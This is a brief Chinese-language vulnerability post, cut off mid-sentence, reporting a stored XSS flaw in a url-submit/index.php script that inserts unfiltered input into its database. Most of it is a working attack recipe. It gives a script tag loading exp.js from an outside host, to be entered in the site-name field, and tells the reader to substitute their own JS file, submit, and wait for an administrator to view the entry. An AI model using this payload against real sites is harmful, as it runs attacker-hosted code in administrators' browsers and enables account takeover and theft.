漏洞发现者:Sogili漏洞介绍:url-submit/index.php对提交的数据未过滤直接插入数据库,造成了储蓄性XSS漏洞测试方法：在网站名称那一栏填写<script src=http://www.sogili.com/exp.js></script>（src是填自己的js文件的地址,别跟我说那文件不存在）其它的符合要求就OK..然后提交..等待管理员查